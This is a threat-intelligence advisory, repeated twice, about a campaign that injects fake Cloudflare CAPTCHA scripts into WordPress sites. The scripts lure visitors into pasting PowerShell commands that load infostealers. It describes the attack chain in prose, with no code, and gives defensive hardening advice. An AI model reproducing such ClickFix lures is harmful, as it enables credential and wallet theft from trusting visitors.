Compromised WordPress Sites Deliver ClickFix Attacks in Global Infostealer Campaign
Summary:
Rapid7 Labs has identified an active, large-scale campaign in which an unidentified threat actor is compromising legitimate WordPress websites to deliver ClickFix-style credential and digital wallet stealers to unsuspecting visitors.
Active in its current form since December 2025, the campaign has infected more than 250 distinct websites across at least 12 countries, including regional news outlets, local businesses, and at least one U.S. Senate candidate's official webpage.
Compromised sites inject a malicious JavaScript snippet that presents visitors with a convincing fake Cloudflare CAPTCHA, which prompts them to execute a PowerShell command copied to their clipboard. This initiates a multi-stage in-memory infection chain dubbed "DoubleDonut," consisting of two sequential Donut shellcode loaders, which ultimately delivers one of several infostealer payloads:
Security Officer Comments:
The primary impact is credential theft and financial loss, with stolen browser credentials potentially enabling downstream attacks against organizations whose employees visited a compromised website. Because the infected sites are legitimate, trusted domains rather than obvious phishing infrastructure, victims are significantly less likely to exercise caution, making the social engineering highly effective.
The use of three distinct infostealer families, including a newly developed custom variant, suggests the threat actor is actively evolving their payload strategy, potentially through LLM-assisted development, and the scale of over 250 compromised sites with automation-driven WordPress compromise indicates a well-resourced and ongoing criminal operation.
Stolen credentials can enable impersonation, lateral movement, ransomware pre-positioning, or further propagation of the ClickFix lures.
Suggested Corrections:
WordPress administrators should prioritize hardening their installations immediately by auditing all plugins and themes for outdated or vulnerable versions, enforcing strong and unique administrative passwords, enabling multi-factor authentication on all admin accounts, and restricting public access to the wp-admin login interface where operationally feasible.
Avoiding execution of untrusted code on devices with saved browser credentials is also critical to preventing credential compromise in the event of a ClickFix encounter.
For end users and enterprise defenders, security awareness training should be updated to include ClickFix tactics, specifically, the social engineering technique of prompting users to paste and execute clipboard-delivered commands under the guise of a CAPTCHA verification.
Additionally, disabling the Windows Run dialog shortcut (Win+R) can reduce the ease of executing pasted ClickFix commands, though defenders should note this does not fully block terminal or Explorer-based execution paths.
Link(s):
https://www.rapid7.com/blog/post/tr...compromise-advances-global-stealer-operation/
Rapid7 Labs has identified an active, large-scale campaign in which an unidentified threat actor is compromising legitimate WordPress websites to deliver ClickFix-style credential and digital wallet stealers to unsuspecting visitors.
Active in its current form since December 2025, the campaign has infected more than 250 distinct websites across at least 12 countries, including regional news outlets, local businesses, and at least one U.S. Senate candidate's official webpage.
Compromised sites inject a malicious JavaScript snippet that presents visitors with a convincing fake Cloudflare CAPTCHA, which prompts them to execute a PowerShell command copied to their clipboard. This initiates a multi-stage in-memory infection chain dubbed "DoubleDonut," consisting of two sequential Donut shellcode loaders, which ultimately delivers one of several infostealer payloads:
- An evolved variant of Vidar Stealer with encrypted C2 configurations.
- An unnamed .NET stealer Rapid7 is calling Impure Stealer.
- A newly identified custom C++ stealer dubbed VodkaStealer.
Security Officer Comments:
The primary impact is credential theft and financial loss, with stolen browser credentials potentially enabling downstream attacks against organizations whose employees visited a compromised website. Because the infected sites are legitimate, trusted domains rather than obvious phishing infrastructure, victims are significantly less likely to exercise caution, making the social engineering highly effective.
The use of three distinct infostealer families, including a newly developed custom variant, suggests the threat actor is actively evolving their payload strategy, potentially through LLM-assisted development, and the scale of over 250 compromised sites with automation-driven WordPress compromise indicates a well-resourced and ongoing criminal operation.
Stolen credentials can enable impersonation, lateral movement, ransomware pre-positioning, or further propagation of the ClickFix lures.
Suggested Corrections:
WordPress administrators should prioritize hardening their installations immediately by auditing all plugins and themes for outdated or vulnerable versions, enforcing strong and unique administrative passwords, enabling multi-factor authentication on all admin accounts, and restricting public access to the wp-admin login interface where operationally feasible.
Avoiding execution of untrusted code on devices with saved browser credentials is also critical to preventing credential compromise in the event of a ClickFix encounter.
For end users and enterprise defenders, security awareness training should be updated to include ClickFix tactics, specifically, the social engineering technique of prompting users to paste and execute clipboard-delivered commands under the guise of a CAPTCHA verification.
Additionally, disabling the Windows Run dialog shortcut (Win+R) can reduce the ease of executing pasted ClickFix commands, though defenders should note this does not fully block terminal or Explorer-based execution paths.
Link(s):
https://www.rapid7.com/blog/post/tr...compromise-advances-global-stealer-operation/